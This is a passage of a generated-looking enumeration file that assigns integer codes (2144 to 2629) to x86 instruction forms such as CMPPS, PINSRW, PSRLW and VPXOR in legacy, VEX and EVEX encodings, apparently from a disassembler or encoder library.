EVEX_VCMPPS_KR_K1_YMM_YMMM256B32_IMM8: int = 2144
EVEX_VCMPPS_KR_K1_ZMM_ZMMM512B32_IMM8_SAE: int = 2145
CMPPD_XMM_XMMM128_IMM8: int = 2146
VEX_VCMPPD_XMM_XMM_XMMM128_IMM8: int = 2147
VEX_VCMPPD_YMM_YMM_YMMM256_IMM8: int = 2148
EVEX_VCMPPD_KR_K1_XMM_XMMM128B64_IMM8: int = 2149
EVEX_VCMPPD_KR_K1_YMM_YMMM256B64_IMM8: int = 2150
EVEX_VCMPPD_KR_K1_ZMM_ZMMM512B64_IMM8_SAE: int = 2151
CMPSS_XMM_XMMM32_IMM8: int = 2152
VEX_VCMPSS_XMM_XMM_XMMM32_IMM8: int = 2153
EVEX_VCMPSS_KR_K1_XMM_XMMM32_IMM8_SAE: int = 2154
CMPSD_XMM_XMMM64_IMM8: int = 2155
VEX_VCMPSD_XMM_XMM_XMMM64_IMM8: int = 2156
EVEX_VCMPSD_KR_K1_XMM_XMMM64_IMM8_SAE: int = 2157
MOVNTI_M32_R32: int = 2158
MOVNTI_M64_R64: int = 2159
PINSRW_MM_R32M16_IMM8: int = 2160
PINSRW_MM_R64M16_IMM8: int = 2161
PINSRW_XMM_R32M16_IMM8: int = 2162
PINSRW_XMM_R64M16_IMM8: int = 2163
VEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2164
VEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2165
EVEX_VPINSRW_XMM_XMM_R32M16_IMM8: int = 2166
EVEX_VPINSRW_XMM_XMM_R64M16_IMM8: int = 2167
PEXTRW_R32_MM_IMM8: int = 2168
PEXTRW_R64_MM_IMM8: int = 2169
PEXTRW_R32_XMM_IMM8: int = 2170
PEXTRW_R64_XMM_IMM8: int = 2171
VEX_VPEXTRW_R32_XMM_IMM8: int = 2172
VEX_VPEXTRW_R64_XMM_IMM8: int = 2173
EVEX_VPEXTRW_R32_XMM_IMM8: int = 2174
EVEX_VPEXTRW_R64_XMM_IMM8: int = 2175
SHUFPS_XMM_XMMM128_IMM8: int = 2176
VEX_VSHUFPS_XMM_XMM_XMMM128_IMM8: int = 2177
VEX_VSHUFPS_YMM_YMM_YMMM256_IMM8: int = 2178
EVEX_VSHUFPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 2179
EVEX_VSHUFPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 2180
EVEX_VSHUFPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 2181
SHUFPD_XMM_XMMM128_IMM8: int = 2182
VEX_VSHUFPD_XMM_XMM_XMMM128_IMM8: int = 2183
VEX_VSHUFPD_YMM_YMM_YMMM256_IMM8: int = 2184
EVEX_VSHUFPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 2185
EVEX_VSHUFPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 2186
EVEX_VSHUFPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 2187
CMPXCHG8B_M64: int = 2188
CMPXCHG16B_M128: int = 2189
XRSTORS_MEM: int = 2190
XRSTORS64_MEM: int = 2191
XSAVEC_MEM: int = 2192
XSAVEC64_MEM: int = 2193
XSAVES_MEM: int = 2194
XSAVES64_MEM: int = 2195
VMPTRLD_M64: int = 2196
VMCLEAR_M64: int = 2197
VMXON_M64: int = 2198
RDRAND_R16: int = 2199
RDRAND_R32: int = 2200
RDRAND_R64: int = 2201
VMPTRST_M64: int = 2202
RDSEED_R16: int = 2203
RDSEED_R32: int = 2204
RDSEED_R64: int = 2205
RDPID_R32: int = 2206
RDPID_R64: int = 2207
BSWAP_R16: int = 2208
BSWAP_R32: int = 2209
BSWAP_R64: int = 2210
ADDSUBPD_XMM_XMMM128: int = 2211
VEX_VADDSUBPD_XMM_XMM_XMMM128: int = 2212
VEX_VADDSUBPD_YMM_YMM_YMMM256: int = 2213
ADDSUBPS_XMM_XMMM128: int = 2214
VEX_VADDSUBPS_XMM_XMM_XMMM128: int = 2215
VEX_VADDSUBPS_YMM_YMM_YMMM256: int = 2216
PSRLW_MM_MMM64: int = 2217
PSRLW_XMM_XMMM128: int = 2218
VEX_VPSRLW_XMM_XMM_XMMM128: int = 2219
VEX_VPSRLW_YMM_YMM_XMMM128: int = 2220
EVEX_VPSRLW_XMM_K1Z_XMM_XMMM128: int = 2221
EVEX_VPSRLW_YMM_K1Z_YMM_XMMM128: int = 2222
EVEX_VPSRLW_ZMM_K1Z_ZMM_XMMM128: int = 2223
PSRLD_MM_MMM64: int = 2224
PSRLD_XMM_XMMM128: int = 2225
VEX_VPSRLD_XMM_XMM_XMMM128: int = 2226
VEX_VPSRLD_YMM_YMM_XMMM128: int = 2227
EVEX_VPSRLD_XMM_K1Z_XMM_XMMM128: int = 2228
EVEX_VPSRLD_YMM_K1Z_YMM_XMMM128: int = 2229
EVEX_VPSRLD_ZMM_K1Z_ZMM_XMMM128: int = 2230
PSRLQ_MM_MMM64: int = 2231
PSRLQ_XMM_XMMM128: int = 2232
VEX_VPSRLQ_XMM_XMM_XMMM128: int = 2233
VEX_VPSRLQ_YMM_YMM_XMMM128: int = 2234
EVEX_VPSRLQ_XMM_K1Z_XMM_XMMM128: int = 2235
EVEX_VPSRLQ_YMM_K1Z_YMM_XMMM128: int = 2236
EVEX_VPSRLQ_ZMM_K1Z_ZMM_XMMM128: int = 2237
PADDQ_MM_MMM64: int = 2238
PADDQ_XMM_XMMM128: int = 2239
VEX_VPADDQ_XMM_XMM_XMMM128: int = 2240
VEX_VPADDQ_YMM_YMM_YMMM256: int = 2241
EVEX_VPADDQ_XMM_K1Z_XMM_XMMM128B64: int = 2242
EVEX_VPADDQ_YMM_K1Z_YMM_YMMM256B64: int = 2243
EVEX_VPADDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2244
PMULLW_MM_MMM64: int = 2245
PMULLW_XMM_XMMM128: int = 2246
VEX_VPMULLW_XMM_XMM_XMMM128: int = 2247
VEX_VPMULLW_YMM_YMM_YMMM256: int = 2248
EVEX_VPMULLW_XMM_K1Z_XMM_XMMM128: int = 2249
EVEX_VPMULLW_YMM_K1Z_YMM_YMMM256: int = 2250
EVEX_VPMULLW_ZMM_K1Z_ZMM_ZMMM512: int = 2251
MOVQ_XMMM64_XMM: int = 2252
VEX_VMOVQ_XMMM64_XMM: int = 2253
EVEX_VMOVQ_XMMM64_XMM: int = 2254
MOVQ2DQ_XMM_MM: int = 2255
MOVDQ2Q_MM_XMM: int = 2256
PMOVMSKB_R32_MM: int = 2257
PMOVMSKB_R64_MM: int = 2258
PMOVMSKB_R32_XMM: int = 2259
PMOVMSKB_R64_XMM: int = 2260
VEX_VPMOVMSKB_R32_XMM: int = 2261
VEX_VPMOVMSKB_R64_XMM: int = 2262
VEX_VPMOVMSKB_R32_YMM: int = 2263
VEX_VPMOVMSKB_R64_YMM: int = 2264
PSUBUSB_MM_MMM64: int = 2265
PSUBUSB_XMM_XMMM128: int = 2266
VEX_VPSUBUSB_XMM_XMM_XMMM128: int = 2267
VEX_VPSUBUSB_YMM_YMM_YMMM256: int = 2268
EVEX_VPSUBUSB_XMM_K1Z_XMM_XMMM128: int = 2269
EVEX_VPSUBUSB_YMM_K1Z_YMM_YMMM256: int = 2270
EVEX_VPSUBUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2271
PSUBUSW_MM_MMM64: int = 2272
PSUBUSW_XMM_XMMM128: int = 2273
VEX_VPSUBUSW_XMM_XMM_XMMM128: int = 2274
VEX_VPSUBUSW_YMM_YMM_YMMM256: int = 2275
EVEX_VPSUBUSW_XMM_K1Z_XMM_XMMM128: int = 2276
EVEX_VPSUBUSW_YMM_K1Z_YMM_YMMM256: int = 2277
EVEX_VPSUBUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2278
PMINUB_MM_MMM64: int = 2279
PMINUB_XMM_XMMM128: int = 2280
VEX_VPMINUB_XMM_XMM_XMMM128: int = 2281
VEX_VPMINUB_YMM_YMM_YMMM256: int = 2282
EVEX_VPMINUB_XMM_K1Z_XMM_XMMM128: int = 2283
EVEX_VPMINUB_YMM_K1Z_YMM_YMMM256: int = 2284
EVEX_VPMINUB_ZMM_K1Z_ZMM_ZMMM512: int = 2285
PAND_MM_MMM64: int = 2286
PAND_XMM_XMMM128: int = 2287
VEX_VPAND_XMM_XMM_XMMM128: int = 2288
VEX_VPAND_YMM_YMM_YMMM256: int = 2289
EVEX_VPANDD_XMM_K1Z_XMM_XMMM128B32: int = 2290
EVEX_VPANDD_YMM_K1Z_YMM_YMMM256B32: int = 2291
EVEX_VPANDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2292
EVEX_VPANDQ_XMM_K1Z_XMM_XMMM128B64: int = 2293
EVEX_VPANDQ_YMM_K1Z_YMM_YMMM256B64: int = 2294
EVEX_VPANDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2295
PADDUSB_MM_MMM64: int = 2296
PADDUSB_XMM_XMMM128: int = 2297
VEX_VPADDUSB_XMM_XMM_XMMM128: int = 2298
VEX_VPADDUSB_YMM_YMM_YMMM256: int = 2299
EVEX_VPADDUSB_XMM_K1Z_XMM_XMMM128: int = 2300
EVEX_VPADDUSB_YMM_K1Z_YMM_YMMM256: int = 2301
EVEX_VPADDUSB_ZMM_K1Z_ZMM_ZMMM512: int = 2302
PADDUSW_MM_MMM64: int = 2303
PADDUSW_XMM_XMMM128: int = 2304
VEX_VPADDUSW_XMM_XMM_XMMM128: int = 2305
VEX_VPADDUSW_YMM_YMM_YMMM256: int = 2306
EVEX_VPADDUSW_XMM_K1Z_XMM_XMMM128: int = 2307
EVEX_VPADDUSW_YMM_K1Z_YMM_YMMM256: int = 2308
EVEX_VPADDUSW_ZMM_K1Z_ZMM_ZMMM512: int = 2309
PMAXUB_MM_MMM64: int = 2310
PMAXUB_XMM_XMMM128: int = 2311
VEX_VPMAXUB_XMM_XMM_XMMM128: int = 2312
VEX_VPMAXUB_YMM_YMM_YMMM256: int = 2313
EVEX_VPMAXUB_XMM_K1Z_XMM_XMMM128: int = 2314
EVEX_VPMAXUB_YMM_K1Z_YMM_YMMM256: int = 2315
EVEX_VPMAXUB_ZMM_K1Z_ZMM_ZMMM512: int = 2316
PANDN_MM_MMM64: int = 2317
PANDN_XMM_XMMM128: int = 2318
VEX_VPANDN_XMM_XMM_XMMM128: int = 2319
VEX_VPANDN_YMM_YMM_YMMM256: int = 2320
EVEX_VPANDND_XMM_K1Z_XMM_XMMM128B32: int = 2321
EVEX_VPANDND_YMM_K1Z_YMM_YMMM256B32: int = 2322
EVEX_VPANDND_ZMM_K1Z_ZMM_ZMMM512B32: int = 2323
EVEX_VPANDNQ_XMM_K1Z_XMM_XMMM128B64: int = 2324
EVEX_VPANDNQ_YMM_K1Z_YMM_YMMM256B64: int = 2325
EVEX_VPANDNQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2326
PAVGB_MM_MMM64: int = 2327
PAVGB_XMM_XMMM128: int = 2328
VEX_VPAVGB_XMM_XMM_XMMM128: int = 2329
VEX_VPAVGB_YMM_YMM_YMMM256: int = 2330
EVEX_VPAVGB_XMM_K1Z_XMM_XMMM128: int = 2331
EVEX_VPAVGB_YMM_K1Z_YMM_YMMM256: int = 2332
EVEX_VPAVGB_ZMM_K1Z_ZMM_ZMMM512: int = 2333
PSRAW_MM_MMM64: int = 2334
PSRAW_XMM_XMMM128: int = 2335
VEX_VPSRAW_XMM_XMM_XMMM128: int = 2336
VEX_VPSRAW_YMM_YMM_XMMM128: int = 2337
EVEX_VPSRAW_XMM_K1Z_XMM_XMMM128: int = 2338
EVEX_VPSRAW_YMM_K1Z_YMM_XMMM128: int = 2339
EVEX_VPSRAW_ZMM_K1Z_ZMM_XMMM128: int = 2340
PSRAD_MM_MMM64: int = 2341
PSRAD_XMM_XMMM128: int = 2342
VEX_VPSRAD_XMM_XMM_XMMM128: int = 2343
VEX_VPSRAD_YMM_YMM_XMMM128: int = 2344
EVEX_VPSRAD_XMM_K1Z_XMM_XMMM128: int = 2345
EVEX_VPSRAD_YMM_K1Z_YMM_XMMM128: int = 2346
EVEX_VPSRAD_ZMM_K1Z_ZMM_XMMM128: int = 2347
EVEX_VPSRAQ_XMM_K1Z_XMM_XMMM128: int = 2348
EVEX_VPSRAQ_YMM_K1Z_YMM_XMMM128: int = 2349
EVEX_VPSRAQ_ZMM_K1Z_ZMM_XMMM128: int = 2350
PAVGW_MM_MMM64: int = 2351
PAVGW_XMM_XMMM128: int = 2352
VEX_VPAVGW_XMM_XMM_XMMM128: int = 2353
VEX_VPAVGW_YMM_YMM_YMMM256: int = 2354
EVEX_VPAVGW_XMM_K1Z_XMM_XMMM128: int = 2355
EVEX_VPAVGW_YMM_K1Z_YMM_YMMM256: int = 2356
EVEX_VPAVGW_ZMM_K1Z_ZMM_ZMMM512: int = 2357
PMULHUW_MM_MMM64: int = 2358
PMULHUW_XMM_XMMM128: int = 2359
VEX_VPMULHUW_XMM_XMM_XMMM128: int = 2360
VEX_VPMULHUW_YMM_YMM_YMMM256: int = 2361
EVEX_VPMULHUW_XMM_K1Z_XMM_XMMM128: int = 2362
EVEX_VPMULHUW_YMM_K1Z_YMM_YMMM256: int = 2363
EVEX_VPMULHUW_ZMM_K1Z_ZMM_ZMMM512: int = 2364
PMULHW_MM_MMM64: int = 2365
PMULHW_XMM_XMMM128: int = 2366
VEX_VPMULHW_XMM_XMM_XMMM128: int = 2367
VEX_VPMULHW_YMM_YMM_YMMM256: int = 2368
EVEX_VPMULHW_XMM_K1Z_XMM_XMMM128: int = 2369
EVEX_VPMULHW_YMM_K1Z_YMM_YMMM256: int = 2370
EVEX_VPMULHW_ZMM_K1Z_ZMM_ZMMM512: int = 2371
CVTTPD2DQ_XMM_XMMM128: int = 2372
VEX_VCVTTPD2DQ_XMM_XMMM128: int = 2373
VEX_VCVTTPD2DQ_XMM_YMMM256: int = 2374
EVEX_VCVTTPD2DQ_XMM_K1Z_XMMM128B64: int = 2375
EVEX_VCVTTPD2DQ_XMM_K1Z_YMMM256B64: int = 2376
EVEX_VCVTTPD2DQ_YMM_K1Z_ZMMM512B64_SAE: int = 2377
CVTDQ2PD_XMM_XMMM64: int = 2378
VEX_VCVTDQ2PD_XMM_XMMM64: int = 2379
VEX_VCVTDQ2PD_YMM_XMMM128: int = 2380
EVEX_VCVTDQ2PD_XMM_K1Z_XMMM64B32: int = 2381
EVEX_VCVTDQ2PD_YMM_K1Z_XMMM128B32: int = 2382
EVEX_VCVTDQ2PD_ZMM_K1Z_YMMM256B32_ER: int = 2383
EVEX_VCVTQQ2PD_XMM_K1Z_XMMM128B64: int = 2384
EVEX_VCVTQQ2PD_YMM_K1Z_YMMM256B64: int = 2385
EVEX_VCVTQQ2PD_ZMM_K1Z_ZMMM512B64_ER: int = 2386
CVTPD2DQ_XMM_XMMM128: int = 2387
VEX_VCVTPD2DQ_XMM_XMMM128: int = 2388
VEX_VCVTPD2DQ_XMM_YMMM256: int = 2389
EVEX_VCVTPD2DQ_XMM_K1Z_XMMM128B64: int = 2390
EVEX_VCVTPD2DQ_XMM_K1Z_YMMM256B64: int = 2391
EVEX_VCVTPD2DQ_YMM_K1Z_ZMMM512B64_ER: int = 2392
MOVNTQ_M64_MM: int = 2393
MOVNTDQ_M128_XMM: int = 2394
VEX_VMOVNTDQ_M128_XMM: int = 2395
VEX_VMOVNTDQ_M256_YMM: int = 2396
EVEX_VMOVNTDQ_M128_XMM: int = 2397
EVEX_VMOVNTDQ_M256_YMM: int = 2398
EVEX_VMOVNTDQ_M512_ZMM: int = 2399
PSUBSB_MM_MMM64: int = 2400
PSUBSB_XMM_XMMM128: int = 2401
VEX_VPSUBSB_XMM_XMM_XMMM128: int = 2402
VEX_VPSUBSB_YMM_YMM_YMMM256: int = 2403
EVEX_VPSUBSB_XMM_K1Z_XMM_XMMM128: int = 2404
EVEX_VPSUBSB_YMM_K1Z_YMM_YMMM256: int = 2405
EVEX_VPSUBSB_ZMM_K1Z_ZMM_ZMMM512: int = 2406
PSUBSW_MM_MMM64: int = 2407
PSUBSW_XMM_XMMM128: int = 2408
VEX_VPSUBSW_XMM_XMM_XMMM128: int = 2409
VEX_VPSUBSW_YMM_YMM_YMMM256: int = 2410
EVEX_VPSUBSW_XMM_K1Z_XMM_XMMM128: int = 2411
EVEX_VPSUBSW_YMM_K1Z_YMM_YMMM256: int = 2412
EVEX_VPSUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2413
PMINSW_MM_MMM64: int = 2414
PMINSW_XMM_XMMM128: int = 2415
VEX_VPMINSW_XMM_XMM_XMMM128: int = 2416
VEX_VPMINSW_YMM_YMM_YMMM256: int = 2417
EVEX_VPMINSW_XMM_K1Z_XMM_XMMM128: int = 2418
EVEX_VPMINSW_YMM_K1Z_YMM_YMMM256: int = 2419
EVEX_VPMINSW_ZMM_K1Z_ZMM_ZMMM512: int = 2420
POR_MM_MMM64: int = 2421
POR_XMM_XMMM128: int = 2422
VEX_VPOR_XMM_XMM_XMMM128: int = 2423
VEX_VPOR_YMM_YMM_YMMM256: int = 2424
EVEX_VPORD_XMM_K1Z_XMM_XMMM128B32: int = 2425
EVEX_VPORD_YMM_K1Z_YMM_YMMM256B32: int = 2426
EVEX_VPORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2427
EVEX_VPORQ_XMM_K1Z_XMM_XMMM128B64: int = 2428
EVEX_VPORQ_YMM_K1Z_YMM_YMMM256B64: int = 2429
EVEX_VPORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2430
PADDSB_MM_MMM64: int = 2431
PADDSB_XMM_XMMM128: int = 2432
VEX_VPADDSB_XMM_XMM_XMMM128: int = 2433
VEX_VPADDSB_YMM_YMM_YMMM256: int = 2434
EVEX_VPADDSB_XMM_K1Z_XMM_XMMM128: int = 2435
EVEX_VPADDSB_YMM_K1Z_YMM_YMMM256: int = 2436
EVEX_VPADDSB_ZMM_K1Z_ZMM_ZMMM512: int = 2437
PADDSW_MM_MMM64: int = 2438
PADDSW_XMM_XMMM128: int = 2439
VEX_VPADDSW_XMM_XMM_XMMM128: int = 2440
VEX_VPADDSW_YMM_YMM_YMMM256: int = 2441
EVEX_VPADDSW_XMM_K1Z_XMM_XMMM128: int = 2442
EVEX_VPADDSW_YMM_K1Z_YMM_YMMM256: int = 2443
EVEX_VPADDSW_ZMM_K1Z_ZMM_ZMMM512: int = 2444
PMAXSW_MM_MMM64: int = 2445
PMAXSW_XMM_XMMM128: int = 2446
VEX_VPMAXSW_XMM_XMM_XMMM128: int = 2447
VEX_VPMAXSW_YMM_YMM_YMMM256: int = 2448
EVEX_VPMAXSW_XMM_K1Z_XMM_XMMM128: int = 2449
EVEX_VPMAXSW_YMM_K1Z_YMM_YMMM256: int = 2450
EVEX_VPMAXSW_ZMM_K1Z_ZMM_ZMMM512: int = 2451
PXOR_MM_MMM64: int = 2452
PXOR_XMM_XMMM128: int = 2453
VEX_VPXOR_XMM_XMM_XMMM128: int = 2454
VEX_VPXOR_YMM_YMM_YMMM256: int = 2455
EVEX_VPXORD_XMM_K1Z_XMM_XMMM128B32: int = 2456
EVEX_VPXORD_YMM_K1Z_YMM_YMMM256B32: int = 2457
EVEX_VPXORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2458
EVEX_VPXORQ_XMM_K1Z_XMM_XMMM128B64: int = 2459
EVEX_VPXORQ_YMM_K1Z_YMM_YMMM256B64: int = 2460
EVEX_VPXORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2461
LDDQU_XMM_M128: int = 2462
VEX_VLDDQU_XMM_M128: int = 2463
VEX_VLDDQU_YMM_M256: int = 2464
PSLLW_MM_MMM64: int = 2465
PSLLW_XMM_XMMM128: int = 2466
VEX_VPSLLW_XMM_XMM_XMMM128: int = 2467
VEX_VPSLLW_YMM_YMM_XMMM128: int = 2468
EVEX_VPSLLW_XMM_K1Z_XMM_XMMM128: int = 2469
EVEX_VPSLLW_YMM_K1Z_YMM_XMMM128: int = 2470
EVEX_VPSLLW_ZMM_K1Z_ZMM_XMMM128: int = 2471
PSLLD_MM_MMM64: int = 2472
PSLLD_XMM_XMMM128: int = 2473
VEX_VPSLLD_XMM_XMM_XMMM128: int = 2474
VEX_VPSLLD_YMM_YMM_XMMM128: int = 2475
EVEX_VPSLLD_XMM_K1Z_XMM_XMMM128: int = 2476
EVEX_VPSLLD_YMM_K1Z_YMM_XMMM128: int = 2477
EVEX_VPSLLD_ZMM_K1Z_ZMM_XMMM128: int = 2478
PSLLQ_MM_MMM64: int = 2479
PSLLQ_XMM_XMMM128: int = 2480
VEX_VPSLLQ_XMM_XMM_XMMM128: int = 2481
VEX_VPSLLQ_YMM_YMM_XMMM128: int = 2482
EVEX_VPSLLQ_XMM_K1Z_XMM_XMMM128: int = 2483
EVEX_VPSLLQ_YMM_K1Z_YMM_XMMM128: int = 2484
EVEX_VPSLLQ_ZMM_K1Z_ZMM_XMMM128: int = 2485
PMULUDQ_MM_MMM64: int = 2486
PMULUDQ_XMM_XMMM128: int = 2487
VEX_VPMULUDQ_XMM_XMM_XMMM128: int = 2488
VEX_VPMULUDQ_YMM_YMM_YMMM256: int = 2489
EVEX_VPMULUDQ_XMM_K1Z_XMM_XMMM128B64: int = 2490
EVEX_VPMULUDQ_YMM_K1Z_YMM_YMMM256B64: int = 2491
EVEX_VPMULUDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2492
PMADDWD_MM_MMM64: int = 2493
PMADDWD_XMM_XMMM128: int = 2494
VEX_VPMADDWD_XMM_XMM_XMMM128: int = 2495
VEX_VPMADDWD_YMM_YMM_YMMM256: int = 2496
EVEX_VPMADDWD_XMM_K1Z_XMM_XMMM128: int = 2497
EVEX_VPMADDWD_YMM_K1Z_YMM_YMMM256: int = 2498
EVEX_VPMADDWD_ZMM_K1Z_ZMM_ZMMM512: int = 2499
PSADBW_MM_MMM64: int = 2500
PSADBW_XMM_XMMM128: int = 2501
VEX_VPSADBW_XMM_XMM_XMMM128: int = 2502
VEX_VPSADBW_YMM_YMM_YMMM256: int = 2503
EVEX_VPSADBW_XMM_XMM_XMMM128: int = 2504
EVEX_VPSADBW_YMM_YMM_YMMM256: int = 2505
EVEX_VPSADBW_ZMM_ZMM_ZMMM512: int = 2506
MASKMOVQ_RDI_MM_MM: int = 2507
MASKMOVDQU_RDI_XMM_XMM: int = 2508
VEX_VMASKMOVDQU_RDI_XMM_XMM: int = 2509
PSUBB_MM_MMM64: int = 2510
PSUBB_XMM_XMMM128: int = 2511
VEX_VPSUBB_XMM_XMM_XMMM128: int = 2512
VEX_VPSUBB_YMM_YMM_YMMM256: int = 2513
EVEX_VPSUBB_XMM_K1Z_XMM_XMMM128: int = 2514
EVEX_VPSUBB_YMM_K1Z_YMM_YMMM256: int = 2515
EVEX_VPSUBB_ZMM_K1Z_ZMM_ZMMM512: int = 2516
PSUBW_MM_MMM64: int = 2517
PSUBW_XMM_XMMM128: int = 2518
VEX_VPSUBW_XMM_XMM_XMMM128: int = 2519
VEX_VPSUBW_YMM_YMM_YMMM256: int = 2520
EVEX_VPSUBW_XMM_K1Z_XMM_XMMM128: int = 2521
EVEX_VPSUBW_YMM_K1Z_YMM_YMMM256: int = 2522
EVEX_VPSUBW_ZMM_K1Z_ZMM_ZMMM512: int = 2523
PSUBD_MM_MMM64: int = 2524
PSUBD_XMM_XMMM128: int = 2525
VEX_VPSUBD_XMM_XMM_XMMM128: int = 2526
VEX_VPSUBD_YMM_YMM_YMMM256: int = 2527
EVEX_VPSUBD_XMM_K1Z_XMM_XMMM128B32: int = 2528
EVEX_VPSUBD_YMM_K1Z_YMM_YMMM256B32: int = 2529
EVEX_VPSUBD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2530
PSUBQ_MM_MMM64: int = 2531
PSUBQ_XMM_XMMM128: int = 2532
VEX_VPSUBQ_XMM_XMM_XMMM128: int = 2533
VEX_VPSUBQ_YMM_YMM_YMMM256: int = 2534
EVEX_VPSUBQ_XMM_K1Z_XMM_XMMM128B64: int = 2535
EVEX_VPSUBQ_YMM_K1Z_YMM_YMMM256B64: int = 2536
EVEX_VPSUBQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2537
PADDB_MM_MMM64: int = 2538
PADDB_XMM_XMMM128: int = 2539
VEX_VPADDB_XMM_XMM_XMMM128: int = 2540
VEX_VPADDB_YMM_YMM_YMMM256: int = 2541
EVEX_VPADDB_XMM_K1Z_XMM_XMMM128: int = 2542
EVEX_VPADDB_YMM_K1Z_YMM_YMMM256: int = 2543
EVEX_VPADDB_ZMM_K1Z_ZMM_ZMMM512: int = 2544
PADDW_MM_MMM64: int = 2545
PADDW_XMM_XMMM128: int = 2546
VEX_VPADDW_XMM_XMM_XMMM128: int = 2547
VEX_VPADDW_YMM_YMM_YMMM256: int = 2548
EVEX_VPADDW_XMM_K1Z_XMM_XMMM128: int = 2549
EVEX_VPADDW_YMM_K1Z_YMM_YMMM256: int = 2550
EVEX_VPADDW_ZMM_K1Z_ZMM_ZMMM512: int = 2551
PADDD_MM_MMM64: int = 2552
PADDD_XMM_XMMM128: int = 2553
VEX_VPADDD_XMM_XMM_XMMM128: int = 2554
VEX_VPADDD_YMM_YMM_YMMM256: int = 2555
EVEX_VPADDD_XMM_K1Z_XMM_XMMM128B32: int = 2556
EVEX_VPADDD_YMM_K1Z_YMM_YMMM256B32: int = 2557
EVEX_VPADDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2558
UD0_R16_RM16: int = 2559
UD0_R32_RM32: int = 2560
UD0_R64_RM64: int = 2561
PSHUFB_MM_MMM64: int = 2562
PSHUFB_XMM_XMMM128: int = 2563
VEX_VPSHUFB_XMM_XMM_XMMM128: int = 2564
VEX_VPSHUFB_YMM_YMM_YMMM256: int = 2565
EVEX_VPSHUFB_XMM_K1Z_XMM_XMMM128: int = 2566
EVEX_VPSHUFB_YMM_K1Z_YMM_YMMM256: int = 2567
EVEX_VPSHUFB_ZMM_K1Z_ZMM_ZMMM512: int = 2568
PHADDW_MM_MMM64: int = 2569
PHADDW_XMM_XMMM128: int = 2570
VEX_VPHADDW_XMM_XMM_XMMM128: int = 2571
VEX_VPHADDW_YMM_YMM_YMMM256: int = 2572
PHADDD_MM_MMM64: int = 2573
PHADDD_XMM_XMMM128: int = 2574
VEX_VPHADDD_XMM_XMM_XMMM128: int = 2575
VEX_VPHADDD_YMM_YMM_YMMM256: int = 2576
PHADDSW_MM_MMM64: int = 2577
PHADDSW_XMM_XMMM128: int = 2578
VEX_VPHADDSW_XMM_XMM_XMMM128: int = 2579
VEX_VPHADDSW_YMM_YMM_YMMM256: int = 2580
PMADDUBSW_MM_MMM64: int = 2581
PMADDUBSW_XMM_XMMM128: int = 2582
VEX_VPMADDUBSW_XMM_XMM_XMMM128: int = 2583
VEX_VPMADDUBSW_YMM_YMM_YMMM256: int = 2584
EVEX_VPMADDUBSW_XMM_K1Z_XMM_XMMM128: int = 2585
EVEX_VPMADDUBSW_YMM_K1Z_YMM_YMMM256: int = 2586
EVEX_VPMADDUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2587
PHSUBW_MM_MMM64: int = 2588
PHSUBW_XMM_XMMM128: int = 2589
VEX_VPHSUBW_XMM_XMM_XMMM128: int = 2590
VEX_VPHSUBW_YMM_YMM_YMMM256: int = 2591
PHSUBD_MM_MMM64: int = 2592
PHSUBD_XMM_XMMM128: int = 2593
VEX_VPHSUBD_XMM_XMM_XMMM128: int = 2594
VEX_VPHSUBD_YMM_YMM_YMMM256: int = 2595
PHSUBSW_MM_MMM64: int = 2596
PHSUBSW_XMM_XMMM128: int = 2597
VEX_VPHSUBSW_XMM_XMM_XMMM128: int = 2598
VEX_VPHSUBSW_YMM_YMM_YMMM256: int = 2599
PSIGNB_MM_MMM64: int = 2600
PSIGNB_XMM_XMMM128: int = 2601
VEX_VPSIGNB_XMM_XMM_XMMM128: int = 2602
VEX_VPSIGNB_YMM_YMM_YMMM256: int = 2603
PSIGNW_MM_MMM64: int = 2604
PSIGNW_XMM_XMMM128: int = 2605
VEX_VPSIGNW_XMM_XMM_XMMM128: int = 2606
VEX_VPSIGNW_YMM_YMM_YMMM256: int = 2607
PSIGND_MM_MMM64: int = 2608
PSIGND_XMM_XMMM128: int = 2609
VEX_VPSIGND_XMM_XMM_XMMM128: int = 2610
VEX_VPSIGND_YMM_YMM_YMMM256: int = 2611
PMULHRSW_MM_MMM64: int = 2612
PMULHRSW_XMM_XMMM128: int = 2613
VEX_VPMULHRSW_XMM_XMM_XMMM128: int = 2614
VEX_VPMULHRSW_YMM_YMM_YMMM256: int = 2615
EVEX_VPMULHRSW_XMM_K1Z_XMM_XMMM128: int = 2616
EVEX_VPMULHRSW_YMM_K1Z_YMM_YMMM256: int = 2617
EVEX_VPMULHRSW_ZMM_K1Z_ZMM_ZMMM512: int = 2618
VEX_VPERMILPS_XMM_XMM_XMMM128: int = 2619
VEX_VPERMILPS_YMM_YMM_YMMM256: int = 2620
EVEX_VPERMILPS_XMM_K1Z_XMM_XMMM128B32: int = 2621
EVEX_VPERMILPS_YMM_K1Z_YMM_YMMM256B32: int = 2622
EVEX_VPERMILPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2623
VEX_VPERMILPD_XMM_XMM_XMMM128: int = 2624
VEX_VPERMILPD_YMM_YMM_YMMM256: int = 2625
EVEX_VPERMILPD_XMM_K1Z_XMM_XMMM128B64: int = 2626
EVEX_VPERMILPD_YMM_K1Z_YMM_YMMM256B64: int = 2627
EVEX_VPERMILPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2628
VEX_VTESTPS_XMM_XMMM128: int = 2629
